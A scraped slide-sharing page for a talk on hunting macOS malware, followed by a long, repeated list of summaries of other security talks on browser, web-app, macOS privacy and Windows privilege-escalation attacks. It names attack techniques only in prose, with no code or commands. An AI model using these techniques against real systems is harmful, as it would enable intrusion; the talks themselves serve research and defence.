Macdoored
•
0 likes•416 views
This document discusses techniques used for hunting and analyzing malware on Mac systems. It describes common commands used by attackers for reconnaissance, backdoor installation, persistence, cleanup, and lateral movement. Specific indicators are also provided, such as backdoor file names and IP addresses. Hunting involves understanding the process tree and difficulties in detection given legitimate system tools are also used by attackers.
Report
Share
Report
Share
Download to read offline
Recommended
Web (dis)assembly
This document provides an overview of WebAssembly (WASM) and analyzes its attack surface. It begins with a brief history of WASM and describes its Minimum Viable Product (MVP) 1.0 specification, which defines its instruction set and file format. It then discusses WASM's implementation in web browsers and interaction with JavaScript, highlighting its potential attack surface. Examples of past vulnerabilities leveraging WASM are also provided, such as CVE-2017-5116 which used a race condition to redirect execution to attacker-controlled code. The document concludes by discussing the future of WASM and taking questions.
I can be apple and so can you
The document summarizes a presentation about exploiting a vulnerability in Apple's code signing process on macOS. The vulnerability allows ad-hoc signed malicious code to bypass Gatekeeper and execute on systems where only Apple-signed code is supposed to run. The presentation covered code signing basics, a demonstration of the vulnerability, technical details, how it impacts third-party software vendors, the disclosure process to Apple, and recommendations for properly validating signed code.
Oversight: Exposing spies on macOS
One of the most insidious actions of malware is abusing the video and audio capabilities of an infected host to record an unknowing user. Macs of course, are not immune; malware such as OSX/Eleanor, OSX/Crisis, and others, all attempt to spy on OS X users.
And as was recently shown by the author, more advanced malware could piggyback into legitimate webcam sessions in order to covertly record the local user. As there are no visible indications of this malicious activity (as the LED light is already on), the malware can record both audio and video without fear of detection.
After examining various ‘webcam-aware’ OS X malware samples and describing the technical details of the piggyback attack, the talk will dive into OverSight.
OverSight is a free tool that implements various novel protection mechanisms in order to alert Mac users of any code that attempts to access the mic or webcam (even via the stealthy piggyback attack). We’ll dive into the design and technical details of tool, describing various components for the first time.
Following this, we’ll look at an interesting case study, where OverSight discovered that a popular mac application was continuing to record, even when the user turned it off. Yikes! Finally, the talk will conclude by discussing future trends of both webcam/mic aware macOS malware and defensive detection methodologies. With such insights, we’ll strive to keep macOS users protected and secure!
Pwned in Translation - from Subtitles to RCE
What if I told you, that when you're watching a movie on your PC or streamer - someone might also be watching you. And he might be doing so - using subtitles.
Yes, subtitles, those innocent looking text lines at the bottom of your screen. Millions of people use them without a second thought – never wondering where they come from, where they're parsed or how they are rendered. You might be surprised to find that there are actually more than 25 subtitle formats out there, most of which support exotic features such as HTML tags, raw images or even freeform binary (What?). Moreover, there is no standard library designed to parse subtitles, which leaves this task to be independently implemented by the various media players. What can go wrong?
Well, basically - everything.
This presentation will show, for the first-ever time on stage, the disastrous potential of subtitles as an attack vector. We will explain and demo the numerous vulnerabilities we found involving subtitles. There will be unsanitized JavaScript running on native web applications; file systems being manipulated; heaps being corrupted; and full RCE on the most common streaming platforms including VLC, Kodi (XBMC) and PopcornTime. It really seems there is no limit to what can be done using those little helpful text files.
But perhaps the best thing about this attack vector, is that in some of these media players, subtitles are automatically downloaded, requiring no user interaction. These subtitles are commonly downloaded from shared online repositories (such as OpenSubtitles) where they are indexed and ranked. In order to make sure our crafted malicious subtitles would be the ones downloaded by the video player, we had to manipulate the website ranking algorithm. So, we did that as well - Look ma, no MITM.
Since we showed full control over the entire subtitles chain is possible, an attacker using this technique can also choose to narrow his target audience based on the subtitle language and specific movies or simply spray his exploits in all directions, which leaves millions of people exposed to this new infection method.
Cloud forensics putting the bits back together
The document discusses forensic investigations of AWS EC2 instances and EBS volumes. It details the process the author took to launch EC2 instances with different EBS volume types, write and delete files, snapshot the volumes, and use forensic software to recover deleted files from the snapshots. The results showed that standard, gp2 and io1 volume types had the highest recovery rates of deleted files from snapshots, while sc1 and st1 volume types recovered fewer files and in some cases produced anomalously large PDF files. Maintaining chain of custody of forensic evidence and using separate AWS accounts was recommended to safeguard recovered data.
44CON London 2015 - Is there an EFI monster inside your apple?
This document discusses EFI (Extensible Firmware Interface) and potential threats from EFI rootkits. It begins with an introduction to EFI and how it has replaced BIOS. It describes how EFI initializes systems at a low level and provides modular and feature-rich access. It then discusses potential malicious actions such as persisting across operating system reinstalls and bypassing full-disk encryption. It provides examples of real EFI rootkits and vulnerabilities discovered. It discusses tools and techniques for dumping and analyzing EFI contents, including the different regions stored in flash memory. Finally, it outlines the EFI boot process and programming interfaces.
Nginx warhead
The document profiles Sergey Belov and discusses his background as a pentester, writer, and bug bounty hunter. It then outlines some potential ways Nginx could be used for MitM/phishing attacks, including modifying requests through reverse proxies and DNS rebinding to target internal resources. The document cautions that additional steps like DNS poisoning would be needed and that the techniques carry instability risks and should be removed from security reports.
44CON London 2015 - reverse reverse engineering
This document discusses techniques for reverse engineering obfuscated Ruby bytecode. It introduces Unrubby, a tool that hooks into the Ruby VM to intercept and dump bytecode as it is executed. By leveraging the dynamic nature of Ruby, Unrubby is able to "unfurl" metaprogramming and expose dynamically generated methods. The author demonstrates using Unrubby to deobfuscate code and discusses challenges in defeating such a tool.
Recommended
Web (dis)assembly
This document provides an overview of WebAssembly (WASM) and analyzes its attack surface. It begins with a brief history of WASM and describes its Minimum Viable Product (MVP) 1.0 specification, which defines its instruction set and file format. It then discusses WASM's implementation in web browsers and interaction with JavaScript, highlighting its potential attack surface. Examples of past vulnerabilities leveraging WASM are also provided, such as CVE-2017-5116 which used a race condition to redirect execution to attacker-controlled code. The document concludes by discussing the future of WASM and taking questions.
I can be apple and so can you
The document summarizes a presentation about exploiting a vulnerability in Apple's code signing process on macOS. The vulnerability allows ad-hoc signed malicious code to bypass Gatekeeper and execute on systems where only Apple-signed code is supposed to run. The presentation covered code signing basics, a demonstration of the vulnerability, technical details, how it impacts third-party software vendors, the disclosure process to Apple, and recommendations for properly validating signed code.
Oversight: Exposing spies on macOS
One of the most insidious actions of malware is abusing the video and audio capabilities of an infected host to record an unknowing user. Macs of course, are not immune; malware such as OSX/Eleanor, OSX/Crisis, and others, all attempt to spy on OS X users.
And as was recently shown by the author, more advanced malware could piggyback into legitimate webcam sessions in order to covertly record the local user. As there are no visible indications of this malicious activity (as the LED light is already on), the malware can record both audio and video without fear of detection.
After examining various ‘webcam-aware’ OS X malware samples and describing the technical details of the piggyback attack, the talk will dive into OverSight.
OverSight is a free tool that implements various novel protection mechanisms in order to alert Mac users of any code that attempts to access the mic or webcam (even via the stealthy piggyback attack). We’ll dive into the design and technical details of tool, describing various components for the first time.
Following this, we’ll look at an interesting case study, where OverSight discovered that a popular mac application was continuing to record, even when the user turned it off. Yikes! Finally, the talk will conclude by discussing future trends of both webcam/mic aware macOS malware and defensive detection methodologies. With such insights, we’ll strive to keep macOS users protected and secure!
Pwned in Translation - from Subtitles to RCE
What if I told you, that when you're watching a movie on your PC or streamer - someone might also be watching you. And he might be doing so - using subtitles.
Yes, subtitles, those innocent looking text lines at the bottom of your screen. Millions of people use them without a second thought – never wondering where they come from, where they're parsed or how they are rendered. You might be surprised to find that there are actually more than 25 subtitle formats out there, most of which support exotic features such as HTML tags, raw images or even freeform binary (What?). Moreover, there is no standard library designed to parse subtitles, which leaves this task to be independently implemented by the various media players. What can go wrong?
Well, basically - everything.
This presentation will show, for the first-ever time on stage, the disastrous potential of subtitles as an attack vector. We will explain and demo the numerous vulnerabilities we found involving subtitles. There will be unsanitized JavaScript running on native web applications; file systems being manipulated; heaps being corrupted; and full RCE on the most common streaming platforms including VLC, Kodi (XBMC) and PopcornTime. It really seems there is no limit to what can be done using those little helpful text files.
But perhaps the best thing about this attack vector, is that in some of these media players, subtitles are automatically downloaded, requiring no user interaction. These subtitles are commonly downloaded from shared online repositories (such as OpenSubtitles) where they are indexed and ranked. In order to make sure our crafted malicious subtitles would be the ones downloaded by the video player, we had to manipulate the website ranking algorithm. So, we did that as well - Look ma, no MITM.
Since we showed full control over the entire subtitles chain is possible, an attacker using this technique can also choose to narrow his target audience based on the subtitle language and specific movies or simply spray his exploits in all directions, which leaves millions of people exposed to this new infection method.
Cloud forensics putting the bits back together
The document discusses forensic investigations of AWS EC2 instances and EBS volumes. It details the process the author took to launch EC2 instances with different EBS volume types, write and delete files, snapshot the volumes, and use forensic software to recover deleted files from the snapshots. The results showed that standard, gp2 and io1 volume types had the highest recovery rates of deleted files from snapshots, while sc1 and st1 volume types recovered fewer files and in some cases produced anomalously large PDF files. Maintaining chain of custody of forensic evidence and using separate AWS accounts was recommended to safeguard recovered data.
44CON London 2015 - Is there an EFI monster inside your apple?
This document discusses EFI (Extensible Firmware Interface) and potential threats from EFI rootkits. It begins with an introduction to EFI and how it has replaced BIOS. It describes how EFI initializes systems at a low level and provides modular and feature-rich access. It then discusses potential malicious actions such as persisting across operating system reinstalls and bypassing full-disk encryption. It provides examples of real EFI rootkits and vulnerabilities discovered. It discusses tools and techniques for dumping and analyzing EFI contents, including the different regions stored in flash memory. Finally, it outlines the EFI boot process and programming interfaces.
Nginx warhead
The document profiles Sergey Belov and discusses his background as a pentester, writer, and bug bounty hunter. It then outlines some potential ways Nginx could be used for MitM/phishing attacks, including modifying requests through reverse proxies and DNS rebinding to target internal resources. The document cautions that additional steps like DNS poisoning would be needed and that the techniques carry instability risks and should be removed from security reports.
44CON London 2015 - reverse reverse engineering
This document discusses techniques for reverse engineering obfuscated Ruby bytecode. It introduces Unrubby, a tool that hooks into the Ruby VM to intercept and dump bytecode as it is executed. By leveraging the dynamic nature of Ruby, Unrubby is able to "unfurl" metaprogramming and expose dynamically generated methods. The author demonstrates using Unrubby to deobfuscate code and discusses challenges in defeating such a tool.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
This document discusses vulnerabilities in WebSocket APIs. It begins with an introduction to the speaker and overview of WebSocket protocols. It then covers specific vulnerabilities like cross-site WebSocket hijacking, authentication issues, and request smuggling through WebSocket connections. The document demonstrates these vulnerabilities through challenges on public sites. It concludes with ideas for further research on WebSocket security.
Securing AEM webapps by hacking them
Slides from adaptTo() 2019 - https://adapt.to/2019/en/schedule/securing-aem-webapps-by-hacking-them.html.
A Hacker's perspective on AEM applications security
Mikhail Egorov gave a presentation on security vulnerabilities in Adobe Experience Manager (AEM) applications. He discussed three vulnerabilities - CVE-2019-8086, CVE-2019-8087, and CVE-2019-8088 - which involved XML external entity injection, JavaScript code injection, and ways to exploit them. He explained the technical details of each vulnerability and provided examples of payloads and steps required for exploitation. Egorov concluded by recommending keeping AEM updated, blocking anonymous write access to certain paths, and removing demo content to help prevent security issues.
Flash it baby!
This document discusses finding vulnerabilities in SWF (Flash) files. It begins with an introduction to embedding SWF files in HTML and ActionScript versions. It then covers strategies for finding SWF files on websites, as well as types of issues like XSS, data hijacking, and information disclosure. The document provides details on tools for automated and manual testing of SWF files, such as decompiling files, identifying input parameters and sinks, and techniques for bypassing protections.
Bug Bounty Hunter Methodology - Nullcon 2016
This is a bug bounty hunter presentation given at Nullcon 2016 by Bugcrowd's Faraz Khan.
Learn more about Bugcrowd here: https://bugcrowd.com/join-the-crowd
[ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers -
The document discusses the challenges of protecting against malware on web browsers through client-side solutions alone. It describes how the author was able to bypass protections in various internet security suites and anti-malware products by creating malicious browser extensions. While some vendors were able to address the issues, the document argues that client-side only solutions are fundamentally limited. It suggests focusing on server-side protections instead of seeking a "client-side elixir" for fully preventing malware.
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
This document provides suggestions for free or low-cost defenses that can frustrate attackers, including enabling EMET, blocking Java user agents at the proxy, port forwarding honeypots, authenticated splash proxies, and deploying "evil canaries" to detect intruders on the network. It emphasizes logging, vulnerability scanning, and getting penetration testers and the help desk involved in security efforts. The document aims to demonstrate mostly free techniques that can significantly improve the security of an organization.
Serverless Security: Defence Against the Dark Arts
The document discusses security best practices for serverless applications. It emphasizes that application dependencies represent a large attack surface and inputs/outputs should be sanitized. The least privilege principle and compartmentalization are important, as is encrypting data at rest and in transit. Unused functions should be deleted, and threats like DoS attacks and credential theft should be guarded against. People can be the weakest link, so secure credentials and implement authentication. The document provides resources for further reading on these topics.
Windows Attacks AT is the new black
This document provides techniques for escalating privileges on Windows systems. It begins with an overview of tricks that can grant escalated privileges to users or administrators. Specific techniques discussed include exploiting misconfigurations, using keyloggers, searching for credentials on systems, exploiting Group Policy Preferences files, unattended installation files, Windows Deployment Services, binary path modifications, service configuration issues, and registry permissions problems. The document then covers methods for escalating from an administrative user to SYSTEM level privileges like using Metasploit exploits, Sysinternals tools, binary replacement, and WMIC. It concludes with sections on achieving persistence and bypassing authentication.
Attacker Ghost Stories - ShmooCon 2014
This document discusses various free or low-cost security measures organizations can implement, including: using EMET to help prevent exploits; blocking Java user agents at the proxy to prevent Java-based exploits; implementing internal bug bounty programs; deploying port-forwarding honeypots; disabling WPAD; restricting internal DNS lookups; and using "evil canary" decoys to detect intruders. It also emphasizes the importance of monitoring for unusual traffic patterns and authentication events.
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
Presentation from LevelUp 0x03 conference - https://forum.bugcrowd.com/t/levelup-0x03-aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs-by-0ang3el/
Window Shopping Browser - Bug Hunting in 2012
Web browsers have become part of everyday life, and are relied upon by millions of internet citizens each day. The feature rich online world has turned the once simple web browser into a highly complex (and very often insecure) desktop application.
As browser vendors have extended functionality and support to new technologies, security researchers and hackers are continuously looking for new vulnerabilities. In this talk, Roberto and Scott will share results of their assiduous browser bug hunting. The talk will examine techniques used to discover critical and less severe vulnerabilities in some of the most popular browsers on the market.
This talk will focus heavily (but not exclusively) on the following areas:
- Memory corruption bugs;
- New approaches to DOM fuzzing;
- Old school techniques against new browser technology;
- Cross Context Scripting and injection attacks;
- SOP Bypass;
The presentation will conclude with a montage of on-stage demonstrations of previously unreleased vulnerabilities, including remote code execution, injections and other tailored browser exploits.
Bug Bounty for - Beginners
The document provides an introduction to bug bounty programs for beginners. It outlines some prerequisites like patience and basic security knowledge. It highlights rewards available in bug bounty programs like money and gifts. The document recommends initial approaches like understanding the testing scope and performing reconnaissance on domains and subdomains. It also provides tips on tools for testing like web proxies and Firefox addons. Automated testing on a local web server is discussed along with techniques for bug submission and reporting. A demo of a stored XSS bug in Facebook is presented at the end.
Practical Exploitation - Webappy Style
The document discusses practical exploitation techniques used by penetration testers and red teams. It outlines the speaker's background as a senior red teamer who breaks into various systems like mainframes, bank accounts, SCADA systems, and web applications. The speaker defines practical exploitation as applying techniques, tactics, and procedures to accomplish objectives within a targeted engagement. The speaker then demonstrates three exploits: 1) Using a Linux pivot to exploit MS08_067 on Windows, 2) Exploiting a Rails vulnerability to steal credentials using Mimikatz on Windows, and 3) Using a Windows pivot to exploit DistCC on Linux via WinRM on IIS. The speaker emphasizes patching vulnerabilities and not enabling services like WinRM on DMZ
Ekoparty 2017 - The Bug Hunter's Methodology
The document outlines a methodology for effectively finding security vulnerabilities in web applications through bug hunting. It covers discovery techniques like using search engines and subdomain enumeration tools. It then discusses mapping the application by directory brute forcing and vulnerability discovery. Specific vulnerability classes covered include XSS, SQLi, file uploads, LFI/RFI, and CSRF. The document provides resources for each vulnerability type and recommends tools that can help automate the testing process.
Defending Against Application DoS attacks
Abstract:
Secure code practices, system hardening, due diligence and due care principles are paramount in mitigating application level DoS attacks. These attacks often result in significant damage against unprepared and vulnerable organisations.
The intent of this talk is to help organisations in strengthening their security posture against such attacks. The talk will explore most common application level DoS attacks and will provide recommendations for protecting applications, detecting attacks and how to react under stressful conditions.
Cross Context Scripting attacks & exploitation
Cross Context Scripting (XCS) is a type of XSS (Cross Site Scripting) injection which occurs from an untrusted zone, typically a web page on the Internet into the context of a trusted browser zone.
XSS injection in a trusted browser zone can be 'lethal', as injected payload runs as privileged code. No SOP (Same-Origin Policy) restrictions are enforced and direct interfacing with the underlying OS is possible.
To exploit such bugs, there is no need to use ROP gadgets, spray the heap or attempt other complex techniques. At the opposite, only few elements are required for a successful exploit, such as the right injection point and a tailored exploit payload.
This presentation will examine XCS in details and will provide a demonstration of XCS exploits of both unpatched and patched vulnerabilities in Firefox, Opera, Maxthon and Avant browsers.
20+ ways to bypass your mac os privacy mechanisms
"TotallyNotAVirus.app" would like to access the camera and spy on you. To protect your privacy, Apple introduced Transparency, Consent, and Control (TCC) framework that restricts access to sensitive personal resources: documents, camera, microphone, emails, and more. Granting such access requires authorization, and the mechanism's main design concern was clear user consent.
In this talk, we will share multiple techniques that allowed us to bypass this prompt, and as a malicious application, get access to protected resources without any additional privileges or user's consent. Together, we submitted over 40 vulnerabilities just to Apple through the past year, which allowed us to bypass some parts or the entire TCC. We also found numerous vulnerabilities in third-party apps (including Firefox, Signal, and others), which allowed us to avoid the OS restrictions by leveraging the targeted apps' privileges.
In the first part of the talk, we will give you an overview of the TCC framework, its building blocks, and how it limits application access to private data. We will explore the various databases it uses and discuss the difference between user consent and user intent.
Next, we will go through various techniques and specific vulnerabilities that we used to bypass TCC. We will cover how we can use techniques like process injection, mounting, application behavior, or simple file searches to find vulnerabilities and gain access to the protected resources.
The audience will leave with a solid understanding of the macOS privacy restrictions framework (TCC) and its weaknesses. We believe there is a need to raise awareness on why OS protections are not 100% effective, and in the end, users have to be careful with installing software on their machines. Moreover - as we're going to publish several exploits - red teams will also benefit from the talk.
Random numbers
The document discusses vulnerabilities in random number generation in PHP. It summarizes several vulnerabilities discovered between 2008-2012 related to predictable random numbers generated by PHP functions like mt_rand(). It also discusses how PHP developers have been slow to address these issues. The document then provides step-by-step explanations of how to exploit vulnerabilities in four different CMS platforms - OpenCart, DataLife Engine, UMI.CMS, and OpenCart again - by predicting random values used for tasks like password resets and session IDs.
Build Lifecycle Craftsmanship for the Transylvania JUG
The document discusses various tools used at different stages of the software development lifecycle, including build tools like Maven and Gradle, continuous integration tools like Jenkins, code quality tools like Sonar, runtime analysis tools like VisualVM and BTrace. It provides brief overviews and links for each tool discussed.
A Developer’s Guide to Kubernetes Security
Kubernetes is spreading like crazy across our industry, but most of us are just thrown into the deep end and expected to learn it ourselves. And we do, sort of. We figure out just enough to get our job done, but we don’t have the experience to know if we are doing it right. There is a lot to learn in a technology that is rapidly evolving. The good news is that there are tools and practices to help show us the way.
Join Gene as he shows you what you need to know as a developer to use Kubernetes safely and effectively. He’ll show you some tools you can use to ensure your containers are available, resilient, and secure. They won’t slow you down, won’t cost an arm and a leg, and won’t need you to be a security expert or experienced cloud architect. We’ll use Kubernetes to help us deploy software, not worrying if it will get us fired.
OSCP Preparation Guide @ Infosectrain
The Offensive Security Certified Professional (OSCP) is one of the most technical and most challenging certifications for information security professionals.
For More information please contact us : https://www.infosectrain.com/
More Related Content
What's hot
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
This document discusses vulnerabilities in WebSocket APIs. It begins with an introduction to the speaker and overview of WebSocket protocols. It then covers specific vulnerabilities like cross-site WebSocket hijacking, authentication issues, and request smuggling through WebSocket connections. The document demonstrates these vulnerabilities through challenges on public sites. It concludes with ideas for further research on WebSocket security.
Securing AEM webapps by hacking them
Slides from adaptTo() 2019 - https://adapt.to/2019/en/schedule/securing-aem-webapps-by-hacking-them.html.
A Hacker's perspective on AEM applications security
Mikhail Egorov gave a presentation on security vulnerabilities in Adobe Experience Manager (AEM) applications. He discussed three vulnerabilities - CVE-2019-8086, CVE-2019-8087, and CVE-2019-8088 - which involved XML external entity injection, JavaScript code injection, and ways to exploit them. He explained the technical details of each vulnerability and provided examples of payloads and steps required for exploitation. Egorov concluded by recommending keeping AEM updated, blocking anonymous write access to certain paths, and removing demo content to help prevent security issues.
Flash it baby!
This document discusses finding vulnerabilities in SWF (Flash) files. It begins with an introduction to embedding SWF files in HTML and ActionScript versions. It then covers strategies for finding SWF files on websites, as well as types of issues like XSS, data hijacking, and information disclosure. The document provides details on tools for automated and manual testing of SWF files, such as decompiling files, identifying input parameters and sinks, and techniques for bypassing protections.
Bug Bounty Hunter Methodology - Nullcon 2016
This is a bug bounty hunter presentation given at Nullcon 2016 by Bugcrowd's Faraz Khan.
Learn more about Bugcrowd here: https://bugcrowd.com/join-the-crowd
[ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers -
The document discusses the challenges of protecting against malware on web browsers through client-side solutions alone. It describes how the author was able to bypass protections in various internet security suites and anti-malware products by creating malicious browser extensions. While some vendors were able to address the issues, the document argues that client-side only solutions are fundamentally limited. It suggests focusing on server-side protections instead of seeking a "client-side elixir" for fully preventing malware.
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
This document provides suggestions for free or low-cost defenses that can frustrate attackers, including enabling EMET, blocking Java user agents at the proxy, port forwarding honeypots, authenticated splash proxies, and deploying "evil canaries" to detect intruders on the network. It emphasizes logging, vulnerability scanning, and getting penetration testers and the help desk involved in security efforts. The document aims to demonstrate mostly free techniques that can significantly improve the security of an organization.
Serverless Security: Defence Against the Dark Arts
The document discusses security best practices for serverless applications. It emphasizes that application dependencies represent a large attack surface and inputs/outputs should be sanitized. The least privilege principle and compartmentalization are important, as is encrypting data at rest and in transit. Unused functions should be deleted, and threats like DoS attacks and credential theft should be guarded against. People can be the weakest link, so secure credentials and implement authentication. The document provides resources for further reading on these topics.
Windows Attacks AT is the new black
This document provides techniques for escalating privileges on Windows systems. It begins with an overview of tricks that can grant escalated privileges to users or administrators. Specific techniques discussed include exploiting misconfigurations, using keyloggers, searching for credentials on systems, exploiting Group Policy Preferences files, unattended installation files, Windows Deployment Services, binary path modifications, service configuration issues, and registry permissions problems. The document then covers methods for escalating from an administrative user to SYSTEM level privileges like using Metasploit exploits, Sysinternals tools, binary replacement, and WMIC. It concludes with sections on achieving persistence and bypassing authentication.
Attacker Ghost Stories - ShmooCon 2014
This document discusses various free or low-cost security measures organizations can implement, including: using EMET to help prevent exploits; blocking Java user agents at the proxy to prevent Java-based exploits; implementing internal bug bounty programs; deploying port-forwarding honeypots; disabling WPAD; restricting internal DNS lookups; and using "evil canary" decoys to detect intruders. It also emphasizes the importance of monitoring for unusual traffic patterns and authentication events.
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
Presentation from LevelUp 0x03 conference - https://forum.bugcrowd.com/t/levelup-0x03-aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs-by-0ang3el/
Window Shopping Browser - Bug Hunting in 2012
Web browsers have become part of everyday life, and are relied upon by millions of internet citizens each day. The feature rich online world has turned the once simple web browser into a highly complex (and very often insecure) desktop application.
As browser vendors have extended functionality and support to new technologies, security researchers and hackers are continuously looking for new vulnerabilities. In this talk, Roberto and Scott will share results of their assiduous browser bug hunting. The talk will examine techniques used to discover critical and less severe vulnerabilities in some of the most popular browsers on the market.
This talk will focus heavily (but not exclusively) on the following areas:
- Memory corruption bugs;
- New approaches to DOM fuzzing;
- Old school techniques against new browser technology;
- Cross Context Scripting and injection attacks;
- SOP Bypass;
The presentation will conclude with a montage of on-stage demonstrations of previously unreleased vulnerabilities, including remote code execution, injections and other tailored browser exploits.
Bug Bounty for - Beginners
The document provides an introduction to bug bounty programs for beginners. It outlines some prerequisites like patience and basic security knowledge. It highlights rewards available in bug bounty programs like money and gifts. The document recommends initial approaches like understanding the testing scope and performing reconnaissance on domains and subdomains. It also provides tips on tools for testing like web proxies and Firefox addons. Automated testing on a local web server is discussed along with techniques for bug submission and reporting. A demo of a stored XSS bug in Facebook is presented at the end.
Practical Exploitation - Webappy Style
The document discusses practical exploitation techniques used by penetration testers and red teams. It outlines the speaker's background as a senior red teamer who breaks into various systems like mainframes, bank accounts, SCADA systems, and web applications. The speaker defines practical exploitation as applying techniques, tactics, and procedures to accomplish objectives within a targeted engagement. The speaker then demonstrates three exploits: 1) Using a Linux pivot to exploit MS08_067 on Windows, 2) Exploiting a Rails vulnerability to steal credentials using Mimikatz on Windows, and 3) Using a Windows pivot to exploit DistCC on Linux via WinRM on IIS. The speaker emphasizes patching vulnerabilities and not enabling services like WinRM on DMZ
Ekoparty 2017 - The Bug Hunter's Methodology
The document outlines a methodology for effectively finding security vulnerabilities in web applications through bug hunting. It covers discovery techniques like using search engines and subdomain enumeration tools. It then discusses mapping the application by directory brute forcing and vulnerability discovery. Specific vulnerability classes covered include XSS, SQLi, file uploads, LFI/RFI, and CSRF. The document provides resources for each vulnerability type and recommends tools that can help automate the testing process.
Defending Against Application DoS attacks
Abstract:
Secure code practices, system hardening, due diligence and due care principles are paramount in mitigating application level DoS attacks. These attacks often result in significant damage against unprepared and vulnerable organisations.
The intent of this talk is to help organisations in strengthening their security posture against such attacks. The talk will explore most common application level DoS attacks and will provide recommendations for protecting applications, detecting attacks and how to react under stressful conditions.
Cross Context Scripting attacks & exploitation
Cross Context Scripting (XCS) is a type of XSS (Cross Site Scripting) injection which occurs from an untrusted zone, typically a web page on the Internet into the context of a trusted browser zone.
XSS injection in a trusted browser zone can be 'lethal', as injected payload runs as privileged code. No SOP (Same-Origin Policy) restrictions are enforced and direct interfacing with the underlying OS is possible.
To exploit such bugs, there is no need to use ROP gadgets, spray the heap or attempt other complex techniques. At the opposite, only few elements are required for a successful exploit, such as the right injection point and a tailored exploit payload.
This presentation will examine XCS in details and will provide a demonstration of XCS exploits of both unpatched and patched vulnerabilities in Firefox, Opera, Maxthon and Avant browsers.
20+ ways to bypass your mac os privacy mechanisms
"TotallyNotAVirus.app" would like to access the camera and spy on you. To protect your privacy, Apple introduced Transparency, Consent, and Control (TCC) framework that restricts access to sensitive personal resources: documents, camera, microphone, emails, and more. Granting such access requires authorization, and the mechanism's main design concern was clear user consent.
In this talk, we will share multiple techniques that allowed us to bypass this prompt, and as a malicious application, get access to protected resources without any additional privileges or user's consent. Together, we submitted over 40 vulnerabilities just to Apple through the past year, which allowed us to bypass some parts or the entire TCC. We also found numerous vulnerabilities in third-party apps (including Firefox, Signal, and others), which allowed us to avoid the OS restrictions by leveraging the targeted apps' privileges.
In the first part of the talk, we will give you an overview of the TCC framework, its building blocks, and how it limits application access to private data. We will explore the various databases it uses and discuss the difference between user consent and user intent.
Next, we will go through various techniques and specific vulnerabilities that we used to bypass TCC. We will cover how we can use techniques like process injection, mounting, application behavior, or simple file searches to find vulnerabilities and gain access to the protected resources.
The audience will leave with a solid understanding of the macOS privacy restrictions framework (TCC) and its weaknesses. We believe there is a need to raise awareness on why OS protections are not 100% effective, and in the end, users have to be careful with installing software on their machines. Moreover - as we're going to publish several exploits - red teams will also benefit from the talk.
Random numbers
The document discusses vulnerabilities in random number generation in PHP. It summarizes several vulnerabilities discovered between 2008-2012 related to predictable random numbers generated by PHP functions like mt_rand(). It also discusses how PHP developers have been slow to address these issues. The document then provides step-by-step explanations of how to exploit vulnerabilities in four different CMS platforms - OpenCart, DataLife Engine, UMI.CMS, and OpenCart again - by predicting random values used for tasks like password resets and session IDs.
Build Lifecycle Craftsmanship for the Transylvania JUG
The document discusses various tools used at different stages of the software development lifecycle, including build tools like Maven and Gradle, continuous integration tools like Jenkins, code quality tools like Sonar, runtime analysis tools like VisualVM and BTrace. It provides brief overviews and links for each tool discussed.
What's hot (20)
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
A Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications security
[ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers -
[ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers -
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Serverless Security: Defence Against the Dark Arts
Serverless Security: Defence Against the Dark Arts
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
Build Lifecycle Craftsmanship for the Transylvania JUG
Build Lifecycle Craftsmanship for the Transylvania JUG
Similar to Macdoored
A Developer’s Guide to Kubernetes Security
Kubernetes is spreading like crazy across our industry, but most of us are just thrown into the deep end and expected to learn it ourselves. And we do, sort of. We figure out just enough to get our job done, but we don’t have the experience to know if we are doing it right. There is a lot to learn in a technology that is rapidly evolving. The good news is that there are tools and practices to help show us the way.
Join Gene as he shows you what you need to know as a developer to use Kubernetes safely and effectively. He’ll show you some tools you can use to ensure your containers are available, resilient, and secure. They won’t slow you down, won’t cost an arm and a leg, and won’t need you to be a security expert or experienced cloud architect. We’ll use Kubernetes to help us deploy software, not worrying if it will get us fired.
OSCP Preparation Guide @ Infosectrain
The Offensive Security Certified Professional (OSCP) is one of the most technical and most challenging certifications for information security professionals.
For More information please contact us : https://www.infosectrain.com/
How the antiviruses work
Presentation on AV and their operation. Some information about static, dynamic and network activities. AMSI, metasploit templates and signing binary file
Continuous Delivery: The Next Frontier
Code testing and Continuous Integration are just the first step in a source code to production process. Combined with infrastructure-as-code tools such as Puppet the whole process can be automated, and tested!
A Battle Against the Industry - Beating Antivirus for Meterpreter and More
This talk goes over how stagers work in a different manner. Rather than standard function calls, I show how to utilize the same functionality in a slightly different way. It talks about Veil-Evasion, and a signature that was developed for it. Finally, I get into custom code and showcase three pieces of custom code that completely bypass antivirus.
Living off the land and fileless attack techniques
Living off the land tactics involve attackers using only pre-installed software and tools on a system to carry out an attack without installing additional binaries. This allows attacks to be harder to detect and trace since it does not involve new files being placed on a system. Attackers make use of techniques like memory-only attacks, scripts hidden in locations like the registry rather than files, and abusing legitimate dual-use tools to blend in and carry out lateral movement, credential theft, and other objectives. Defending against these tactics requires advanced detection methods that can analyze behaviors rather than just files to identify potentially malicious activity and abuse of system tools.
Lessons Learned in Automating Compliance for Containers
This document discusses open source software compliance for containers. It explains that container images are made up of layered filesystems, so the dependencies and licenses of each layer need to be determined. However, determining this information can be challenging as Dockerfiles and container build processes do not always provide full transparency. The document introduces the Tern tool, which aims to automate open source software compliance for containers by analyzing package managers, files, and layers to provide package versions, licenses, and software sources used.
